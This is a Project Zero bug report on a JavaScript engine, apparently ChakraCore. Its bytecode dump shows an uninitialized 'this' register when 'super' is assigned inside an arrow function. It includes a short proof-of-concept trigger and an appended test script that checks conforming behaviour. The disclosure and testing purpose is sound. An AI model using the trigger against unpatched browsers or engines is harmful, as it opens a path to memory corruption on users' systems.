<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1283

"EmitAssignment" doesn't call "EmitSuperMethodBegin" that initializes the "this" register for the case when the super keyword is used.

Here's the generated bytecode for the lambda function in the PoC. R5 is uninitialized.

Function Anonymous function ( (#1.3), #4) (In0) (size: 7 [7])
9 locals (1 temps from R8), 1 inline cache
Constant Table:
======== =====
R1 LdRoot
R2 Ld_A (undefined)
R3 LdC_A_I4 int:1

0000 ProfiledLdEnvSlot R6 = [1][4] <0>
000c ProfiledLdEnvSlot R4 = [1][3] <1>

Line 28: super.a = 1;
Col 13: ^
0018 LdHomeObjProto R8 R4
001d ProfiledStSuperFld R8.(this=R5) = R3 #0 <0>
0025 LdUndef R0

Line 29: }
Col 9: ^
0027 Ret

PoC:
-->

class Parent {
};

class Child extends Parent {
    constructor() {
        (() => {
            super.a = 10; // Implicitly use the "this" register. So it must be initialized.
        })();
    }
};

new Child();
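Added reference check, not part of the original PoC: on a conforming engine, `super.a = v` inside an arrow function in a derived constructor must use the enclosing constructor's `this` binding as the receiver of the store (the `this=R5` operand of StSuperFld in the dump above). That means the assignment works once super() has returned and throws a ReferenceError if it runs before super(), which is the situation the PoC creates. The names Base, Derived and probeSuperAssign are assumed for this example; the setter on Base exists only so the receiver the engine passes can be observed.

```javascript
"use strict";

class Base {
  // A setter lets us observe which object the engine passes as the receiver
  // when `super.a = v` runs (the "this" register in the bytecode dump).
  set a(v) {
    this.receivedValue = v;
    this.receiverIsInstance = this instanceof Derived;
  }
}

class Derived extends Base {
  constructor(callSuperFirst) {
    if (callSuperFirst) super();
    // Arrow functions capture the constructor's `this` and home object
    // lexically, so this store must read the constructor's `this` binding,
    // which is only initialized after super() has returned.
    (() => { super.a = 10; })();
  }
}

// Returns what a conforming engine does in both orderings.
function probeSuperAssign() {
  const result = {};

  // Case 1: super() ran first, so `this` is initialized and the setter on
  // Base.prototype is invoked with the new instance as receiver.
  const obj = new Derived(true);
  result.afterSuper = {
    receivedValue: obj.receivedValue,          // 10
    receiverIsInstance: obj.receiverIsInstance // true
  };

  // Case 2: the PoC ordering. `this` is still uninitialized when the arrow
  // function stores through super, so the engine must throw a ReferenceError
  // rather than use whatever the "this" register happens to hold.
  try {
    new Derived(false);
    result.beforeSuper = "no error";
  } catch (e) {
    result.beforeSuper = e.constructor.name;  // "ReferenceError"
  }
  return result;
}
```

Run it under the engine being tested; a fixed build should report the value 10 stored on the instance in the first case and a ReferenceError in the second, never a crash or a store through a stale register.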